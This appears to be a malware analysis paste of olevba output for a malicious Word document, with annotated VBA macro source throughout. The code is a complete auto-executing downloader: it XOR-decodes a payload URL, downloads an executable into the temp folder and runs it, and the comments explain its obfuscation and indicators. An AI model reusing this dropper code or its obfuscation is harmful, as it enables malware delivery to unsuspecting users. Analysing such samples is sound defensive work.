dynamoo

Malicious Word macro

May 6th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 02.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 02.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 02.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  ' Stage 1 of the call chain started by autoopen: HARRIS -> WELDON (MARY.bas).
  ' MARCELINO is never read; the literal argument only pads the call.
  16. Sub HARRIS(MARCELINO As Integer)
  17. WELDON
  18. End Sub
  19.  
  ' Auto-execute entry point: Word runs AutoOpen (case-insensitive) when the
  ' document is opened with macros enabled. Visible call chain in this dump:
  '   autoopen -> HARRIS -> WELDON -> JARVIS -> FREDERIC -> TRUMAN -> KIRBY
  ' KIRBY then downloads a file into the temp folder (OLLIE) and launches it
  ' (DONOVAN). Every numeric/string argument along the chain is ignored by
  ' its callee; the intermediate Subs exist only to pad the call graph.
  20. Sub autoopen()
  21. HARRIS (332)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO MOHAMMAD.bas
  32. in file: 02.doc - OLE stream: u'Macros/VBA/MOHAMMAD'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35.  
  ' 64-bit half of the wininet imports (the 32-bit Declares are in MONROE.bas).
  ' SHELBY = InternetCloseHandle. NOTE: the handle parameter is declared ByRef,
  ' so the API most likely receives the address of the VBA variable rather than
  ' the handle value and the close fails silently -- harmless for the attacker,
  ' but do not expect the handles to be released in a sandbox trace.
  36. #If VBA7 And Win64 Then
  37. Public Declare PtrSafe Function SHELBY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
  38. #End If
  39.  
  ' Download-and-execute orchestrator. LAZARO (ByRef) is overwritten with an
  ' FSO Folder object for the temp directory; HOMER is never referenced.
  40. Public Function KIRBY(ByRef LAZARO As Object, ByRef HOMER As Object) As Boolean
  41.  
  42. Dim CHARLEY As Long
  ' RILEY() = CreateObject(XOR-decoded PORFIRIO) -> "Scripting.FileSystemObject";
  ' TRENTON() returns its .GetSpecialFolder(2), i.e. the TemporaryFolder.
  43. Set LAZARO = TRENTON(RILEY)
  44.  
  45. Dim ADOLFO
  46.  
  47. Dim ALPHONSE As String
  ' MERRILL ignores its first argument and XOR-decodes FEDERICO with the key
  ' HERIBERTO ("VERNBOBBIE1"); decoded value: "\wiley1.exe" (re-derive before use).
  48. ALPHONSE = MERRILL(4000, HERIBERTO, FEDERICO)
  49.  
  ' Junk loop: the body sets CHARLEY to 312 on the first pass, so Next exits
  ' immediately. No effect on anything below.
  50. For CHARLEY = 26 To 47
  51. CHARLEY = CHARLEY * 12
  52. Next CHARLEY
  ' Concatenating the Folder object as a string goes through its default
  ' property (Path), so ADOLFO = <temp dir>\wiley1.exe.
  53. ADOLFO = LAZARO & ALPHONSE
  54.  
  ' Download the payload to ADOLFO. The success flag is discarded: DONOVAN
  ' runs even if nothing was written.
  55. If OLLIE(289, ADOLFO) Then
  56. End If
  57.  
  58.  
  ' Launch the dropped file via Shell.Application.Open (see DONOVAN).
  ' DONOVAN never assigns its return value, so KIRBY returns False.
  59. KIRBY = DONOVAN(LAZARO, ALPHONSE, 681)
  60.  
  61. End Function
  62.  
  63.  
  ' String decoder used for every obfuscated constant in MARY.bas.
  ' JEROLD is a hex string, CHRISTOPER the XOR key. For each hex byte pair i
  ' (1-based) the byte is XORed with the key character at ((i Mod Len(key)) + 1)
  ' and the result appended as Chr$. Note the key index starts at 2, not 1.
  64. Public Function LINWOOD(CHRISTOPER As String, JEROLD As String) As String
  65.    
  66.     Dim BARNEY As Integer
  67.     Dim NESTOR As Integer
  68.    
  69.    
  70.     Dim JOSIAH As Double
  ' Opaque predicate: 312 > 2496 is never true, so End never fires.
  71.  JOSIAH = 312
  72. If JOSIAH > JOSIAH * 8 Then End
  73.    
  74.     Dim FRITZ As Long
  75.     Dim BRANT As String
  ' NICKOLAS = Len(); one iteration per hex pair.
  76.     For FRITZ = 1 To (NICKOLAS(JEROLD) / 2)
  ' HOLLIS: Val("&H" & Mid$(JEROLD, 2*FRITZ-1, 2)) -> byte value.
  77.         BARNEY = HOLLIS(JEROLD, FRITZ)
  ' QUINCY: Asc() of the key character for this position.
  78.         NESTOR = QUINCY(CHRISTOPER, FRITZ)
  ' CARMELO: Chr$(BARNEY Xor NESTOR).
  79.         BRANT = BRANT + CARMELO(BARNEY, NESTOR)
  80.     Next FRITZ
  81.    LINWOOD = BRANT
  82. End Function
  83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  84. ANALYSIS:
  85. +------------+-------------+-------------------------+
  86. | Type       | Keyword     | Description             |
  87. +------------+-------------+-------------------------+
  88. | Suspicious | Lib         | May run code from a DLL |
  89. | IOC        | wininet.dll | Executable file name    |
  90. +------------+-------------+-------------------------+
  91. -------------------------------------------------------------------------------
  92. VBA MACRO MILLARD.bas
  93. in file: 02.doc - OLE stream: u'Macros/VBA/MILLARD'
  94. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  95.  
  96.  
  97.  
  ' Returns a new COM object whose ProgID is XOR-decoded from PORFIRIO with the
  ' key HERIBERTO; decodes to "Scripting.FileSystemObject". Used for the
  ' temp-folder lookup in TRENTON/KIRBY.
  98. Public Function RILEY() As Object
  99. Dim ISMAEL As String
  100. ISMAEL = LINWOOD(HERIBERTO, PORFIRIO)
  101. Set RILEY = CreateObject(ISMAEL)
  102. End Function
  103.  
  104.  
  ' Hex-pair extractor for LINWOOD: MAURICIO returns Mid$(JEROLD, 2*FRITZ-1, 2)
  ' (STEFAN supplies the 2n-1 start index) and ANIBAL is Val(), so
  ' "&H" & pair yields the byte value 0..255. The literal 78 is junk.
  105. Public Function HOLLIS(ByRef JEROLD As String, ByRef FRITZ As Long) As Double
  106.  HOLLIS = ANIBAL("&H" & (MAURICIO(78, JEROLD, STEFAN(FRITZ), 2)))
  107. End Function
  108.  
  109.  
  ' Maps a 1-based byte index to the 1-based start of its hex pair (2n - 1).
  110. Public Function STEFAN(ByRef FRITZ As Long) As Long
  111.  STEFAN = (2 * FRITZ) - 1
  112. End Function
  113.  
  114.  
  ' Opens the payload URL on an existing WinINet session. NOAH is the session
  ' handle from InternetOpenA (HIRAM); GRADY (ByRef) receives the request
  ' handle returned by InternetOpenUrlA (BERNARDO), 0 on failure.
  ' Always returns True, even when GRADY is 0 -- the caller checks GRADY itself.
  115. #If VBA7 And Win64 Then
  116.        Public Function BASIL(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  117.     #Else
  118.        Public Function BASIL(ByRef GRADY As Long, NOAH As Long) As Boolean
  119.     #End If
  120.         Dim JACQUES As Double
  121. Dim GUADALUPE As String
  122. Dim CLARK As Long
  ' XOR-decode ULYSSES with key HERIBERTO -> the download URL.
  ' Decodes to hxxp://jkw-sc[.]com/111/46.exe (defanged; re-derive with
  ' olevba --decode or by re-running LINWOOD before treating it as an IOC).
  123.     GUADALUPE = MERRILL(893, HERIBERTO, ULYSSES)
  124.  
  ' Junk loop with no side effects.
  125. For JACQUES = 22 To 122
  126. JACQUES = JACQUES + 2.25
  127. Next JACQUES
  ' InternetOpenUrlA(hInternet, url, lpszHeaders = NULL, dwHeadersLength = 0,
  ' dwFlags = MAXWELL (&H4000000 -- INTERNET_FLAG_NO_CACHE_WRITE per wininet.h,
  ' confirm), dwContext = 0).
  128.     GRADY = BERNARDO(NOAH, GUADALUPE, vbNullString, 0, MAXWELL, 0)
  129.     BASIL = True
  130. End Function
  131.  
  132.  
  133. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  134. ANALYSIS:
  135. +------------+--------------+--------------------------+
  136. | Type       | Keyword      | Description              |
  137. +------------+--------------+--------------------------+
  138. | Suspicious | CreateObject | May create an OLE object |
  139. +------------+--------------+--------------------------+
  140. -------------------------------------------------------------------------------
  141. VBA MACRO MARIANO.bas
  142. in file: 02.doc - OLE stream: u'Macros/VBA/MARIANO'
  143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  144.  
  145.  
  146.  
  ' Thin wrapper around Len(); exists only to hide the keyword from scanners.
  147. Public Function NICKOLAS(CLEMENT As String) As Long
  148. NICKOLAS = Len(CLEMENT)
  149. End Function
  150.  
  ' Thin wrapper around Val(). The loop is junk: DILLON is overwritten by the
  ' Val() result afterwards, so it has no effect on the return value.
  151. Public Function ANIBAL(FRANCES As String) As Double
  152. Dim DILLON As Double
  153. For DILLON = 26 To 29
  154. DILLON = DILLON * 6.127
  155. Next DILLON
  156. DILLON = Val(FRANCES)
  157. ANIBAL = DILLON
  158. End Function
  159.  
  ' Given a Scripting.FileSystemObject (from RILEY), returns the Folder object
  ' for GetSpecialFolder(2), i.e. TemporaryFolder (%TEMP%). This is where the
  ' downloaded payload is dropped.
  160. Public Function TRENTON(ByRef NICHOLAS As Object) As Object
  161. Set TRENTON = NICHOLAS.GetSpecialFolder(2)
  162. End Function
  163.  
  164.  
  165.  
  ' Downloader. ELVIS is the destination path. Flow: InternetOpenA (HIRAM) ->
  ' InternetOpenUrlA (BASIL) -> InternetReadFile loop (JEFFERSON) into a
  ' DONNELL-byte (4000) buffer -> write the accumulated data to ELVIS with
  ' Open/Put -> InternetCloseHandle both handles. Returns True only if at least
  ' one byte was accumulated. WYATT and KAREEM are unused.
  166. Public Function OLLIE(WYATT As Long, ByVal ELVIS As String) As Boolean
  167.     #If VBA7 And Win64 Then
  168.         Dim LANNY As LongPtr, EZRA As LongPtr
  169.     #Else
  170.         Dim LANNY As Long, EZRA As Long
  171.     #End If
  172.     Dim SYDNEY As Long
  ' RUBIN is a fixed-length 4000-char read buffer; SYDNEY receives bytes read.
  173.     Dim RUBIN As String * DONNELL, ALPHONSO As String
  174.     Dim REED As Integer, ELMO As Double
  ' HIRAM = InternetOpenA("EMERY", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0).
  ' The User-Agent "EMERY" is a usable network detection IOC.
  175.     LANNY = HIRAM
  176.     If LANNY = 0 Then
  177.         Exit Function
  178.     End If
  179.     Dim KAREEM As Boolean
  180.    
  ' Opens the decoded URL; EZRA receives the request handle (0 on failure).
  ' BASIL's return value is always True, so only the EZRA check below matters.
  181.     If BASIL(EZRA, LANNY) Then
  182.     End If
  183.     If EZRA = 0 Then
  184.         ELMO = 0
  185.     Else
  ' First chunk: the WHOLE 4000-char buffer is kept regardless of SYDNEY, so
  ' if the first read is shorter than 4000 bytes, leftover buffer contents
  ' are written to the file as well (sample quirk, not a download failure).
  186.         JEFFERSON EZRA, RUBIN, DONNELL, SYDNEY
  187.         ALPHONSO = RUBIN
  188.           Dim GAIL As Long
  189.           GAIL = 10
  190.           GAIL = GAIL + 11
  ' Opaque predicate: 21 > 133 is never true.
  191. If GAIL > GAIL + 112 Then End
  ' Remaining chunks: append only the bytes actually read, until a zero read.
  192.         Do While SYDNEY <> 0
  193.             JEFFERSON EZRA, RUBIN, DONNELL, SYDNEY
  194.                     ALPHONSO = ALPHONSO + Mid(RUBIN, 1, SYDNEY)
  195.         Loop
  ' ELMO = Len(payload); REED = FreeFile (MAYNARD ignores its argument).
  196.              ELMO = NICKOLAS(ALPHONSO): _
  197.              REED = MAYNARD("JOSEF")
  ' Write the buffered payload to ELVIS (binary mode, exclusive write lock).
  198.         Open ELVIS _
  199.             For Binary _
  200.         Lock Write As #REED
  201.         Put #REED, , ALPHONSO
  202.         GAIL = GAIL + 127
  ' Opaque predicate: GAIL is 148 here, never negative.
  203.     If GAIL < 0 Then End
  204.         Close #REED
  205.     End If
  ' InternetCloseHandle on request and session handles. SHELBY is declared
  ' ByRef, so these calls most likely pass the variable's address instead of
  ' the handle and fail silently.
  206.     SHELBY EZRA
  207.     SHELBY LANNY
  208.     ALPHONSO = ""
  209.     If ELMO Then
  210.         OLLIE = True
  211.     End If
  212. End Function
  213.  
  ' Execution stage. This module has no Option Explicit, so LENNY is an
  ' implicitly declared Variant. CreateObject(XOR-decoded SEBASTIAN) ->
  ' "Shell.Application"; .Open on <temp dir> & <decoded FEDERICO> launches the
  ' dropped executable. RANDELL is unused and the return value is never
  ' assigned (False).
  214. Public Function DONOVAN(ByRef LAZARO As Object, ByRef ALPHONSE As String, RANDELL As Double) As Boolean
  215.  
  216. Set LENNY = CreateObject(LINWOOD _
  217. (HERIBERTO, SEBASTIAN))
  218. Dim DUSTY As Integer
  219. DUSTY = LENNY.Open(LAZARO & ALPHONSE)
  220. End Function
  221.  
  222. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  223. ANALYSIS:
  224. +------------+--------------+-----------------------------------------+
  225. | Type       | Keyword      | Description                             |
  226. +------------+--------------+-----------------------------------------+
  227. | Suspicious | Open         | May open a file                         |
  228. | Suspicious | CreateObject | May create an OLE object                |
  229. | Suspicious | Binary       | May read or write a binary file (if     |
  230. |            |              | combined with Open)                     |
  231. | Suspicious | Write        | May write to a file (if combined with   |
  232. |            |              | Open)                                   |
  233. | Suspicious | Put          | May write to a file (if combined with   |
  234. |            |              | Open)                                   |
  235. +------------+--------------+-----------------------------------------+
  236. -------------------------------------------------------------------------------
  237. VBA MACRO MARY.bas
  238. in file: 02.doc - OLE stream: u'Macros/VBA/MARY'
  239. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  240.  
  241. Option Explicit
  242.  
  ' 64-bit Declare for InternetReadFile; the 32-bit version is in MONROE.bas.
  ' CARSON is ByRef (lpdwNumberOfBytesRead).
  243. #If VBA7 And Win64 Then
  244. Public Declare PtrSafe Function JEFFERSON Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  245. #End If
  ' Obfuscated strings: hex byte pairs, each XORed with HERIBERTO[(i Mod 11)+1]
  ' by LINWOOD. olevba's "Base64 strings" hit on this module is most likely a
  ' false positive on these hex strings. Decoded values (defanged; re-derive
  ' with olevba --decode or by re-running LINWOOD before using as IOCs):
  '   SEBASTIAN -> "Shell.Application"            (execution, DONOVAN)
  '   FEDERICO  -> "\wiley1.exe"                  (dropped file name, KIRBY)
  '   ULYSSES   -> hxxp://jkw-sc[.]com/111/46.exe (download URL, BASIL)
  '   PORFIRIO  -> "Scripting.FileSystemObject"   (temp-folder lookup, RILEY)
  246. Public Const SEBASTIAN = "163A2B2E236C0339355D3F26333A2B202C"
  247. Public Const FEDERICO = "1925272E2A3B7367204933"
  248. Public Const ULYSSES = "2D263A32756D6D232E467B36316021202F6D78740079716460273727"
  249. Public Const PORFIRIO = "16313C2B3F362B27221F102C3E2B113631362C287E342F372D36"
  ' XOR key (11 characters).
  250. Public Const HERIBERTO = "VERNBOBBIE1"
  251.  
  252.  
  ' Thin wrapper around FreeFile; CLEMENT is ignored.
  253. Public Function MAYNARD(CLEMENT As String) As Integer
  254.     MAYNARD = FreeFile
  255. End Function
  256.  
  ' Key-byte selector for LINWOOD: MAURICIO is Mid$, so this returns
  ' Asc(Mid$(CHRISTOPER, (FRITZ Mod Len(CHRISTOPER)) + 1, 1)). The literal 48
  ' is junk.
  257. Public Function QUINCY(ByRef CHRISTOPER As String, ByRef FRITZ As Long) As Integer
  258. QUINCY = Asc(MAURICIO(48, CHRISTOPER, ((FRITZ Mod NICKOLAS(CHRISTOPER)) + 1), 1))
  259. End Function
  260.  
  261.  
  ' Pass-through to LINWOOD(key, hex). AUGUSTUS is padding: it is tripled but
  ' never read, and every caller passes a literal.
  262. Public Function MERRILL(AUGUSTUS As Long, HILARIO As String, ENRIQUE As String) As String
  263. AUGUSTUS = AUGUSTUS * 3
  264. MERRILL = LINWOOD(HILARIO, ENRIQUE)
  265.    
  266. End Function
  267.  
  268.  
  ' Stage 2 of the call chain (HARRIS -> WELDON -> JARVIS). DEWITT is unused
  ' and the ISIDRO loop has no effect.
  269. Public Sub WELDON()
  270.         Dim DEWITT As Double
  271.  
  272.     Dim ISIDRO As Double
  273. For ISIDRO = 53 To 55
  274. ISIDRO = ISIDRO + 11
  275. Next ISIDRO
  276.  
  277. JARVIS (1.109)
  278.  
  279. End Sub
  280.  
  ' Stage 5 of the call chain and the first function that does real work:
  ' creates the FSO (RILEY) and hands control to KIRBY. Note the local
  ' `Dim MERRILL As Object` shadows the MERRILL() function inside this scope.
  281. Public Function TRUMAN(REINALDO As Double)
  282.  
  283. Dim MERRILL As Object
  284.  
  285.  
  286.     Dim JOHNATHON As Long
  ' Junk loops; JOHNATHON is only ever used in the opaque predicate below.
  287. For JOHNATHON = 11 To 86
  288. JOHNATHON = JOHNATHON + 55
  289. Next JOHNATHON
  290.    
  291.  
  292. Dim WESTON  As Object
  293.  
  294.  
  295. For JOHNATHON = 22 To 33
  296. JOHNATHON = JOHNATHON + 64
  297. Next JOHNATHON
  298.    
  299.  
  ' WESTON = Scripting.FileSystemObject; passed to KIRBY as HOMER, which KIRBY
  ' never uses (it creates its own FSO).
  300. Set WESTON = RILEY
  301. JOHNATHON = JOHNATHON + 66
  302. Dim LEWIS As Boolean
  303.  
  ' Opaque predicate: a positive value is never greater than six times itself.
  304. If JOHNATHON > JOHNATHON * 6 Then End
  ' MERRILL (the empty local Object) is filled in by KIRBY with the temp folder.
  305. LEWIS = KIRBY(MERRILL, WESTON)
  ' Padding; the caller passes an expression, so nothing observable changes.
  306. REINALDO = REINALDO + 47
  307. End Function
  308.  
  309.  
  ' Stage 4 of the call chain (JARVIS -> FREDERIC -> TRUMAN). MERLIN and the
  ' BRENTON string concatenation are padding with no effect.
  310. Public Function FREDERIC(MERLIN As String)
  311. Dim BRENTON As String
  312. BRENTON = "YONG"
  313. TRUMAN 397 + 1.08
  314. BRENTON = BRENTON + "FAUSTINO"
  315. End Function
  316.  
  317.  
  318.  
  319.  
  320.  
  321.  
  322.  
  ' Stage 3 of the call chain (WELDON -> JARVIS -> FREDERIC). ROSARIO is unused.
  323. Sub JARVIS(ROSARIO As Double)
  324.  
  325. FREDERIC ("GAVIN")
  326. End Sub
  327.  
  ' XOR one decoded byte with one key byte and return it as a single character.
  ' This is the only place the Xor and Chr$ keywords appear.
  328. Public Function CARMELO(ByRef BARNEY As Integer, ByRef NESTOR As Integer) As String
  329.     Dim CONNIE As Long
  330.     CONNIE = BARNEY Xor NESTOR
  331.     CARMELO = Chr$(CONNIE)
  332. End Function
  333.  
  334.  
  335.  
  336.  
  337.  
  338. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  339. ANALYSIS:
  340. +------------+----------------+-----------------------------------------+
  341. | Type       | Keyword        | Description                             |
  342. +------------+----------------+-----------------------------------------+
  343. | Suspicious | Chr            | May attempt to obfuscate specific       |
  344. |            |                | strings                                 |
  345. | Suspicious | Xor            | May attempt to obfuscate specific       |
  346. |            |                | strings                                 |
  347. | Suspicious | Lib            | May run code from a DLL                 |
  348. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  349. |            |                | be used to obfuscate strings (option    |
  350. |            |                | --decode to see all)                    |
  351. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  352. |            |                | may be used to obfuscate strings        |
  353. |            |                | (option --decode to see all)            |
  354. | IOC        | wininet.dll    | Executable file name                    |
  355. +------------+----------------+-----------------------------------------+
  356. -------------------------------------------------------------------------------
  357. VBA MACRO MONROE.bas
  358. in file: 02.doc - OLE stream: u'Macros/VBA/MONROE'
  359. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  360.  
  361.  
  362.  
  363.  
  364.  
  ' Unused constant.
  365. Public Const JASPER = "RUSSEL"
  ' 64-bit Declare for InternetOpenUrlA. The #Else branch holds ALL four wininet
  ' imports for 32-bit Office (InternetCloseHandle, InternetOpenA,
  ' InternetReadFile, InternetOpenUrlA); the remaining 64-bit Declares are
  ' spread across MOHAMMAD.bas, MARY.bas and the bottom of this module, so no
  ' single module shows the full import set.
  366. #If VBA7 And Win64 Then
  367. Public Declare PtrSafe Function BERNARDO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As LongPtr, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
  368.  
  369. #Else
  370. Public Declare Function SHELBY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
  371. Public Declare Function BOBBIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALPHONSO As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
  372. Public Declare Function JEFFERSON Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  373. Public Declare Function BERNARDO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As Long, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
  374. #End If
  375.  
  ' DONNELL: InternetReadFile chunk/buffer size used by OLLIE.
  376. Public Const DONNELL = 4000
  ' DENNY: lpszAgent passed to InternetOpenA -- the HTTP User-Agent will be
  ' "EMERY", a usable network detection IOC.
  377. Public Const DENNY As String = "EMERY"
  ' ALDEN: dwAccessType for InternetOpenA; 1 = INTERNET_OPEN_TYPE_DIRECT
  ' (no proxy).
  378. Public Const ALDEN = 1
  ' MAXWELL: dwFlags for InternetOpenUrlA; &H4000000 is
  ' INTERNET_FLAG_NO_CACHE_WRITE per wininet.h (confirm against your SDK).
  379. Public Const MAXWELL = &H4000000
  380.  
  ' 64-bit Declare for InternetOpenA.
  381. #If VBA7 And Win64 Then
  382. Public Declare PtrSafe Function BOBBIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALPHONSO As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
  383. #End If
  384.  
  385.  
  ' Thin wrapper around Mid$(CLEMENT, BARNEY, NESTOR). SAMMY is padding: it is
  ' incremented ByRef but every caller passes a literal, so nothing changes.
  386. Public Function MAURICIO(SAMMY As Long, ByRef CLEMENT As String, ByRef BARNEY As Integer, ByRef NESTOR As Integer) As String
  387.     MAURICIO = Mid$(CLEMENT, BARNEY, NESTOR)
  388.     SAMMY = SAMMY + 23
  389. End Function
  ' Opens the WinINet session: InternetOpenA(lpszAgent = "EMERY",
  ' dwAccessType = 1 (INTERNET_OPEN_TYPE_DIRECT), lpszProxy = NULL,
  ' lpszProxyBypass = NULL, dwFlags = 0). Returns the HINTERNET (0 on failure).
  ' The literal User-Agent "EMERY" is the most stable network IOC in the sample.
  390. #If VBA7 _
  391.     And Win64 Then
  392. Public Function HIRAM() As LongPtr
  393.  #Else
  394. Public Function HIRAM() As Long
  395.  
  396.  #End If
  397.  
  398.  HIRAM = BOBBIE(DENNY, ALDEN, vbNullString, vbNullString, 0)
  399. End Function
  400.  
  401.  
  402.  
  403.  
  404. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  405. ANALYSIS:
  406. +------------+----------------+-----------------------------------------+
  407. | Type       | Keyword        | Description                             |
  408. +------------+----------------+-----------------------------------------+
  409. | Suspicious | Lib            | May run code from a DLL                 |
  410. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  411. |            |                | may be used to obfuscate strings        |
  412. |            |                | (option --decode to see all)            |
  413. | IOC        | wininet.dll    | Executable file name                    |
  414. +------------+----------------+-----------------------------------------+